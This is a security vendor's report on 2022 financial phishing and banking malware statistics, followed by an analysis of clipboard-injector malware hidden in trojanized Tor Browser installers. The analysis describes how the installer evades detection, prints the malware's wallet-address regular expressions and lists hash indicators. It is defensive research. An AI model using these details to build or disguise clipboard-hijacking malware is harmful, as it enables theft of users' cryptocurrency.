To gain insights into the financial threat landscape, we analyzed data on malicious activities on the devices of Kaspersky security product users. Individuals who use these products voluntarily made their data available to us through Kaspersky Security Network. All data collected from Kaspersky Security Network was anonymized.

We compared the data from 2022 to that of 2021 to identify year-on-year trends in malware development. However, we also included occasional references to earlier years to provide further insights into the evolutionary trends in financial malware.

Key findings

Phishing

• Financial phishing accounted for 36.3% of all phishing attacks in 2022.
• E-shop brands were the most popular lure, accounting for 15.56% of attempts to visit phishing sites.
• PayPal was the almost exclusive focus of phishers in the electronic payment systems category, with 84% of phishing pages targeting the platform.
• Cryptocurrency phishing saw 40% year-on-year growth in 2022, with 5,040,520 detections compared to 3,596,437 in 2021

PC malware

• The number of users affected by financial malware continued to decline in 2022, dropping by 14% from 2021.
• Ramnit and Zbot were the most prevalent malware families, targeting over 50% of affected users.
• Consumers remained the primary target of financial cyberthreats, accounting for 61.8% of attacks.

Mobile malware

• The number of Android users attacked with banking malware decreased by around 55% in 2022 compared to the previous year.
• Bian surpassed Agent as the most active mobile malware family in 2022, with 22% of attacks compared to Agent’s 20%.
• The geographical distribution of affected users by Android banking malware in 2022 shows that Spain had the highest percentage of targeted users with 1.96%, followed by Saudi Arabia with 1.11% and Australia with 1.09%.

Financial phishing

Phishing continues to be one of the most widespread forms of cybercrime thanks to the low entry threshold and its effectiveness. As we covered previously, cybercriminals can launch phishing campaigns with minimal effort by purchasing ready-made phishing kits.

Phishing is typically built around a classic scheme: first create a website, then craft emails or notifications that mimic real organizations and prompt users to follow a link to the site, share their personal or payment information, or download a program disguised as malware. Phishers mimic every type of organization, including banks, government services, retail and entertainment, as long as the service has a strong user base.

Financial services in particular are of high interest to phishers due to the direct connection to money and payment data. In 2022, 36.3% of all phishing attacks detected by Kaspersky anti-phishing technologies were related to financial phishing.

Distribution of financial phishing cases by type, 2022 (download)

In this report, financial phishing includes banking-specific, but also e-shop and payment systems.

Payment-system phishing refers to phishing pages that mimic well-known payment brands, such as PayPal, MasterCard, Visa, and American Express. E-shops mean online stores and auction sites such as Amazon, Aliexpress, the App Store, and eBay.

In 2022, e-shop brands were the most popular type of lure used by phishers. 15.56% of attempts to visit phishing sites blocked by Kaspersky in 2022 were related to e-shops. If we look at the distribution within financial phishing, e-shops account for 42% of financial phishing cases. E-shops were followed by payment systems (10.39%) and banks (10.39%). Online shopping continues to grow worldwide and, accordingly, the number of brands that are being mimicked by phishers grows with novel schemes appearing on a regular basis.

E-shop brands most frequently exploited in financial phishing schemes, 2022 (download)

In 2022, Apple remains the most exploited brand by scammers, with almost 60% of attacks. The allure of winning the latest model of a new device has proved irresistible to many users, especially during the current global crisis with increasing prices. Not only did we see a spike in these types of scams during major Apple events, but also scammers frequently use Apple to lure victims by offering, for instance, newly released iPhones as prizes for predicting match outcomes during major events like the FIFA World Cup. Meanwhile, Amazon remained in second place with 14.81% of attacks.

In the realm of electronic payment systems, PayPal has traditionally been a popular target for exploitation by scammers. However, recent data indicates that this year it is not only the primary but the near exclusive focus of phishers, with a staggering 84.23% of phishing pages for electronic payment systems targeting PayPal. As a result, the shares of other payment systems have plummeted, with MasterCard International down to 3.75%, Visa Inc. down to 3.10%, and American Express down to 2.02% in 2022.

Payment system brands most frequently exploited in financial phishing schemes, 2022  (download)

Example of a phishing page mimicking the PayPal login page

Cryptophishing

In 2022, cryptocurrency phishing rose sufficiently to be included as a separate category. While the total number of attempts to visit such sites makes up just a fraction (0.87%) of all phishing, this category of phishing demonstrated 40% year-on-year growth with 5,040,520 detections in 2022 compared to 3,596,437 in 2021. This boom in cryptophishing may be partially explained by the cryptomarket havoc we saw last year. That said, it is so far unclear whether the trend will continue, and this will significantly depend on the trust users put in cryptocurrency.

Example of a phishing page offering crypto

Cryptoscams exploit the topic of cryptocurrency to deceive people and steal their money, often through promises of high returns on investments. Common types include Ponzi schemes, ICO scams, phishing scams, and fake wallet scams.

Example of a phishing page asking for crypto details

Banking malware

This section analyzes banking malware used for stealing login credentials for online banking or payment systems, as well as capturing one-time passwords for two-factor authentication.

Our analysis of financial cyberthreats in 2022 revealed that the number of users affected by financial malware continued to decline. The figures showed a decrease from 405,985 in 2021 to 350,808 in 2022, marking a 14% drop. This decline followed the trend observed over the previous years, with a 35% drop in 2021, a 20% decline in 2020, and a near 13% decrease in 2019. Financial PC malware is on the wane due to the challenges and costs associated with maintaining and developing a botnet capable of successfully attacking users. To execute a successful attack, the Trojan must wait until the user manually logs in to their bank’s website, which has become more infrequent with the growth in popularity of mobile banking apps. Furthermore, the latest versions of operating systems come with built-in security systems, and prolonged presence in the system raises the probability of malware detection. This might also indicate a pivot toward advanced targeted attacks as cybercriminals start to prioritize large business targets.

Additionally, cybercriminals are adapting their tactics to exploit the shift toward mobile banking. As users increasingly switch to phone banking, attackers are developing new techniques to compromise mobile devices and steal sensitive information.

Dynamic change in the number of unique users attacked by banking malware in 2021 – 2022  (download)

Main actors among banking malware

Our 2022 analysis of financial cyberthreats revealed the presence of several families of banking malware with varying lifecycles. Ramnit emerged as the most prevalent malware family with a share of 34.4%, followed by Zbot with 16.2%. Interestingly, the analysis highlights that over 50% of affected users were targeted only by these two families. Ramnit activity increased substantially compared to the previous year, when its slice was only 3.4%. This malware worm spreads through spam emails with links to infected websites, and steals financial information. Emotet, previously named by Europol the world’s most dangerous malware, made a return to the Top 3 most active malware families after law enforcement shut it down in January 2021.

The lifecycle of Emotet vividly demonstrates how malware families continue to evolve and expand their capabilities to infiltrate and compromise financial systems.

Top 10 PC banking malware families

Name Verdicts %* Ramnit/Nimnul Trojan-Banker.Win32.Ramnit 34.4 Zbot/Zeus Trojan-Banker.Win32.Zbot 16.2 Emotet Trojan-Banker.Win32.Emotet 6.4 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 6.2 IcedID Trojan-Banker.Win32.IcedID 4.1 Trickster/Trickbot Trojan-Banker.Win32.Trickster 4.0 SpyEye Trojan-Spy.Win32.SpyEye 3.4 RTM Trojan-Banker.Win32.RTM 2.5 Gozi Trojan-Banker.Win32.Gozi 2.4 BitStealer Trojan-Banker.MSIL.BitStealer 1.6

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of attacked users

In this year’s report, we calculated the percentage of Kaspersky users in each country that encountered a financial cyberthreat relative to all users that were attacked by financial malware. This approach helps us identify the countries with the highest risk of computer infection due to financial malware.

The 2022 report shows the distribution of financial malware attacks across different countries. The Top 20 countries in the list below account for more than half of all infection attempts.

Top 20 countries and territories by share of attacked users

Country or territory* %** Turkmenistan 6.6 Afghanistan 6.5 Tajikistan 4.9 China 3.3 Uzbekistan 3.3 Yemen 3.3 Sudan 2.9 Mauritania 2.8 Egypt 2.5 Azerbaijan 2.5 Venezuela 2.5 Paraguay 2.5 Switzerland 2.4 Syria 2.4 Libya 2.3 Algeria 2.2 Iraq 2.0 Indonesia 1.9 Bangladesh 1.8 Pakistan 1.8

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

The data shows that Turkmenistan has the highest share of attacked users with 6.6%, followed by Afghanistan and Tajikistan with 6.5% and 4.9% respectively.

Types of users attacked

The 2022 numbers show that the distribution of financial cyberthreats remained relatively stable, with consumers (61.8%) still being the primary target and corporate users (38.2%) accounting for a smaller percentage of attacks. The 2022 increase is relatively small, at less than 1%, and does not represent a significant shift in the overall distribution of attacks.

Malware attack distribution by type (corporate vs consumer), 2021 – 2022 (download)

This can be attributed to the fact that the world has become accustomed to the new style of post-pandemic work, with many companies continuing to operate in remote or hybrid work modes. The trend of working from home or remotely is no longer new, and many companies have adapted to it. As a result, they have also learned how to deal with potential threats and have implemented measures to ensure the security of their employees’ devices and data. Now employees are likely using similar devices and security measures for personal and work purposes, making it harder for cybercriminals to differentiate between consumer and corporate targets.

Mobile banking malware

We have been observing a steady and steep downward trend in the number of Android users affected by banking malware for at least four years now. In 2022, the number of Android users attacked with banking malware was 57,219, which is more than 2.5 times less than the figures reported in the previous year, representing a drop of around 55%.

This trend marked a continuation from previous years, with the number of Android users attacked dropping by 55% in 2020 and by almost 50% in 2021, resulting in a total of 147,316 users affected in 2021.

Number of Android users attacked by banking malware by month, 2020 – 2022 (download)

Despite the steady decline in the number of Android users affected by banking malware, it is important for users not to become complacent, as cybercriminals continue to evolve their malware and find new ways to carry out attacks. In 2022, we identified over 200,000 new banking Trojan installers, which is twice the number reported in the previous year.

Comparing the most active mobile malware families of 2021 to those of 2022, we see some significant changes. In 2021, Agent was the most prevalent mobile malware, representing 26.9% of attacks. However, in 2022, Bian surpassed Agent as the most active mobile malware family, with 24.25% attacks compared to Agent’s 21.57%.

As for the other malware families on the list, Anubis (11.24%) and Faketoken (10.53%) maintained their positions in the Top 5, respectively. Asacub also remained in the Top 5 list, with almost 10% of attacks, but dropped to fifth place from its third-place ranking in 2021.

Top10 Android banking malware families

Name Verdicts %* Bian Trojan-Banker.AndroidOS.Bian 24.25 Agent Trojan-Banker.AndroidOS.Agent 21.57 Anubis Trojan-Banker.AndroidOS.Anubis 11.24 Faketoken Trojan-Banker.AndroidOS.Faketoken 10.53 Asacub Trojan-Banker.AndroidOS.Asacub 9.91 Svpeng Trojan-Banker.AndroidOS.Svpeng 6.08 Cebruser Trojan-Banker.AndroidOS.Cebruser 5.23 Gustuff Trojan-Banker.AndroidOS.Gustuff 3.13 Bray Trojan-Banker.AndroidOS.Bray 2.27 Sova Trojan-Banker.AndroidOS.Sova 2.14

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Svpeng, which was the third most prevalent malware family in 2021, with 21.4% of attacks, dropped to sixth place in 2022, with 6.08% attacks. Meanwhile, Cebruser, Gustuff, Bray, and Sova entered the list.

Geography of attacked users

The geographical distribution of affected users by Android banking malware in 2021 shows some differences between the two lists of Top 10 countries and regions. In the first list, Japan had the highest percentage of targeted users with 2.18%, followed by Spain with 1.55%, while in the second list, Spain had the highest percentage with 1.96%, followed by Saudi Arabia with 1.11%.

Australia appeared in both lists, with a 0.48% share in the first list and a 1.09% share in the second. Turkey also appeared in both lists, with a 0.71% share in the first list and a 0.99% share in the second. Italy had a 0.29% share in the first list and a 0.17% share in the second list, while Japan had a 0.30% share in the second list.

Top 10 countries and territories, 2021

Country or territory* %** Japan 2.18 Spain 1.55 Turkey 0.71 France 0.57 Australia 0.48 Germany 0.46 Norway 0.31 Italy 0.29 Croatia 0.28 Austria 0.28

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Top 10 countries and territories, 2022

Country or territory* %** Spain 1.96 Saudi Arabia 1.11 Australia 1.09 Turkey 0.99 Switzerland 0.48 Japan 0.30 Colombia 0.19 Italy 0.17 India 0.16 South Korea 0.16

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Overall, the two lists show that banking malware continues to be a global threat, affecting users in different countries and regions.

Conclusion

Year 2022 demonstrated that banking malware attacks continue to decline, both for PC and mobile malware. Still, the number of such attacks remains significant and users, as always, need to stay vigilant. At the same time, cybercriminals are switching their focus to cryptocurrency, as these attacks are harder to track. With new payment systems emerging, we are sure to see new attacks in the future and, potentially, yet more targeting of cryptocurrency.

Additionally, financial phishing schemes remain a top category in all phishing, with fraudsters continuing to hunt for banking and other sensitive data, exploiting trusted brands. This activity isn’t likely to die down, and we will continue to witness new schemes emerge on a regular basis.

For protection against financial threats, Kaspersky recommends to:

• Install only applications obtained from reliable sources
• Refrain from approving rights or permissions requested by applications without first ensuring they match the application’s feature set
• Never open links or documents included in unexpected or suspicious-looking messages
• Use a reliable security solution, such as Kaspersky Premium, that protects you and your digital infrastructure from a wide range of financial cyberthreats

To protect your business from financial malware, Kaspersky security experts recommend:

• Providing cybersecurity awareness training, especially for employees responsible for accounting, that includes instructions on how to detect phishing pages
• Improving the digital literacy of staff
• Enabling a Default Deny policy for critical user profiles, particularly those in financial departments, which ensures that only legitimate web resources can be accessed
• Installing the latest updates and patches for all software used

It is often the case that something new is just a reincarnation of something old. We have come across a series of clipboard injection attacks on cryptocurrency users, which emerged starting from September 2022. Although we have written about a similar malware attack in 2017 in one of our blogposts, the technique is still very relevant today as it doesn’t have any perfect solution from the perspective of operating system design. The only way to prevent such attacks is to be extremely cautious and attentive, or use a decent anti-malware solution to detect a piece of malicious code. As long as such attacks continue to thrive in the modern ecosystem of the cryptocurrency world, it’s worth explaining how they work and where the danger lies.

In a nutshell, the attack relies on malware replacing part of the clipboard contents once it detects a wallet address in it.

Past Attacks

This technique of replacing clipboard contents is more than a decade old. It all started from banking trojans focused on specific banks and replacing bank account numbers in the clipboard. Here is a report from CERT Polska that warned Polish users about such a threat targeting users of local banks in 2013. However, such attacks required detecting a particular internet banking environment, and their success depended also on other fields being filled correctly (i.e. bank SWIFT code, branch name, etc). Focusing on something global and provider-independent, such as a cryptocurrency wallet, made it much more efficient for cryptothieves. Adding increased value of cryptocurrencies made it a very lucrative target. So, this is where we started seeing the first clipboard attacks on cryptocurrency owners. They were replicated and reused in other malware too. We even made a generic detection for some of such families, naming them Generic.ClipBanker.

Why It Is Dangerous

Despite the attack being fundamentally simple, it harbors more danger than would seem. And not only because it creates irreversible money transfers, but because it is so passive and hard to detect for a normal user. Just think of it, most malware is only efficient when there is a communication channel established between the malware operator and the victim’s system. Backdoors require a control channel, spying trojans require a way to pass stolen data, cryptominers need network communication too, etc. It’s only a small fraction of malware that exist on their own and do not require any communication channel. But this is the most dangerous and harmful kind: self-replicating malware, such as destructive viruses and network worms; ransomware that silently encrypts local files, and so on. While worms and viruses may not connect to the attacker’s control servers, they generate visible network activity, or increase CPU or RAM consumption. So does encrypting ransomware. Clipboard injectors, on the contrary, can be silent for years, show no network activity or any other signs of presence until the disastrous day when they replace a cryptowallet address.

Another factor is detection of the malware payload. While most malware is discovered through an association with known bad infrastructure (IPs, domains, URLs), or when it automatically activates a malicious payload, clipboard injectors do not run their evil payload unless an external condition (the clipboard contains data of certain format) is met. This further lowers the chances of new malware being discovered through automatic sandboxing.

Trojanized Tor Browser installers

Some recent developments in the use of this type of malware seek to abuse Tor Browser, a tool to access the dark web using the Onion protocol, also known as the Tor network. We relate this to the ban of Tor Project’s website in Russia at the end of 2021, which was reported by the Tor Project itself. According to the latter, Russia was the second largest country by number of Tor users in 2021 (with over 300,000 daily users, or 15% of all Tor users). The Tor Project called to help keep Russian users connected to Tor to circumvent censorship. Malware authors heard the call and responded by creating trojanized Tor Browser bundles and distributing them among Russian-speaking users. The first variants appeared in December 2021, but only since August 2022 have we seen a larger wave of torbrowser_ru.exe malicious executables. The trojanized installers offered Tor Browser with a regional language pack, including Russian, as the file name suggests:

Supported languages in the trojanized installer

We have come across hundreds of similar installers that all behaved according to the following scenario:

Trojanized Tor Browser extracting and launching a malware payload

The target user downloads Tor Browser from a third-party resource and starts it as torbrowser.exe. The installer is missing a digital signature and is just a RAR SFX (self-extracting executable) archive. It contains three files:

• The original torbrowser.exe installer with a valid digital signature from the Tor Project.
• A command-line RAR extraction tool with a randomized name.
• A password-protected RAR archive (random password).

The SFX starts the original torbrowser.exe as a disguise, while also running the RAR extraction tool on the embedded password-protected RAR archive. The purpose of protecting it with a password is to evade static-signature detection by antivirus solutions. It doesn’t protect the malware from sandbox-based detection. The password and the destination for the extraction are part of the trojanized torbrowser.exe executable, and may be extracted via manual analysis. Once the file is dropped inside one of the current user AppData subdirectories, the dropped executable is started as a new process and registers itself in the system autostart. Most of the time, the executable is disguised with the icon of a popular application, such as uTorrent.

Clipboard-injector malware

The payload of this installer is passive and communicationless clipboard-injector malware.

The malware is protected with the Enigma packer v4.0, which complicates analysis. Enigma is a commercial software protector. The malware authors likely used a cracked version of the packer lacking any license information. However, if this or another instance from the same malware authors appears in the hands of law enforcement officers, we would like to leave a reference to their system drive serial number, which we extracted from the malware sample: 9061E43A.

The payload of this malware is rather simple: the malware integrates into the chain of Windows clipboard viewers and receives a notification every time the clipboard data is changed. If the clipboard contains text, it scans the contents with a set of embedded regular expressions. Should it find a match, it is replaced with one randomly chosen address from a hardcoded list.

Hexdump of the malware data with regular expressions and replacement wallet IDs

We identified the following regular expressions inside the sample.
bc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Bitcoin
(^|\s)[3]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin/Bitcoin Legacy
(^|\s)D[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}($|\s) – Dogecoin
(^|\s)0x[A-Fa-f0-9]{40}($|\s) – ERC-20 (i.e. Ethereum, Tether, Ripple, etc)
(^|\s)[LM]{1}[a-km-zA-HJ-NP-Z1-9]{25,34}($|\s) – Litecoin Legacy
((^|\s)ltc1[a-zA-HJ-NP-Z0-9]{35,99}($|\s) – Litecoin
(^|\s)8[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero
(^|\s)4[0-9A-B]{1}[1-9A-HJ-NP-Za-km-z]{93,117}($|\s) – Monero

Each sample contains thousands of possible replacement addresses for Bitcoin. Including thousands of addresses makes it harder to denylist them or to trace the theft. However, we collected all of them and would like to share them with researchers and investigators in an attachment to this blog.

The malware authors also preserved a feature to disable their creation: a special hotkey combination (Ctrl+Alt+F10). Pressing it causes the malware to unregister all handlers and stop running. The purpose was likely to disable the malware during the testing stage.

Victimology

Among the roughly 16,000 detections, the majority were registered in Russia and Eastern Europe. However, the threat spread to at least 52 countries worldwide. Here are the TOP 10 countries affected, according to our own data:

• Russia
• Ukraine
• United States
• Germany
• Uzbekistan
• Belarus
• China
• Netherlands
• United Kingdom
• France

Detections of the malicious Tor Browser worldwide, January 2022 – February 2023 (download)

Given that we only see a fraction of the real picture, the global number of infections may well be several or even tens of times higher.

Impact

To measure the impact, we collected hundreds of known malware samples, unpacked them from Enigma, and extracted the cryptowallet replacement addresses. Then we walked through the respective blockchains and calculated the total inputs to the wallets, assuming they all came from compromised users. This is how we measured the total loss caused by this single malware developer.

Stolen cryptocurrencies (converted to USD at the exchange rate valid at the time of writing) (download)

Due to its advanced technology that anonymizes transaction data to achieve maximum privacy, the Monero public ledger doesn’t reveal the transferred amount, so we couldn’t really look into it, but it is likely to be very small compared to the Bitcoin theft.

We believe that the actual theft is bigger because this research is focused on Tor Browser abuse. There may be other campaigns, abusing different software and using other means of malware delivery as well as other types of wallets.

Countermeasures

A mistake likely made by all victims of this malware was to download and run Tor Browser from a third-party resource. We haven’t managed to identify a single website that hosts the installer, so it is likely distributed either via torrent downloads or some other software downloader. The installers coming from the official Tor Project were digitally signed and didn’t contain any signs of such malware. So, to stay safe, in the first place, download software only from reliable and trusted sources.

However, even if you do download a rogue file masked as something else, using a decent antivirus solution or uploading the file to VirusTotal could help identify any malicious intent. Despite all attempts to evade detection, the malware will get discovered, it’s only a matter of time.

Lastly, if you would like to check if your system is compromised with malware from the same class, here is a quick Notepad trick. Type or copy the following “Bitcoin address” in Notepad: bc1heymalwarehowaboutyoureplacethisaddress

Now press Ctrl+C and Ctrl+V. If the address changes to something else — the system is likely compromised by a clipboard-injector type of malware, and is dangerous to use. At this stage we recommend scanning your system with security software for any malware presence. But if you want to have full confidence that no hidden backdoors remain, once a system is compromised, it should not be trusted until rebuilt.

Bitcoin address replaced by malware after pasting in an infected system

Stay safe and don’t let your coins fall into the hands of criminals.

Appendix (indicators of compromise)

Examples of clipboard injectors:

0251fd9c0cd98eb9d35768bb82b57590
036b054c9b4f4ab33da63865d69426ff
037c5bacac12ac4fec07652e25cd5f07
0533fc0c282dd534eb8e32c3ef07fba4
05cedc35de2c003f2b76fe38fa62faa5
0a14b25bff0758cdf7472ac3ac7e21a3
0b2ca1c5439fcac80cb7dd70895f41a6
0c4144a9403419f7b04f20be0a53d558
0d09d13cd019cbebf0d8bfff22bf6185
0d571a2c4ae69672a9692275e325b943

Examples of Tor Browser installers:

a7961c947cf360bbca2517ea4c80ee11
0be06631151bbe6528e4e2ad21452a17
a2b8c62fe1b2191485439dd2c2d9a7b5
53d35403fa4aa184d77a4e5d6f1eb060
ad9460e0a58f0c5638a23bb2a78d5ad7
cbb6f4a740078213abc45c27a2ab9d1c
eaf40e175c15c9c9ab3e170859bdef64
89c86c391bf3275790b465232c37ddf5
1ce04300e880fd12260be4d10705c34f
c137495da5456ec0689bbbcca1f9855e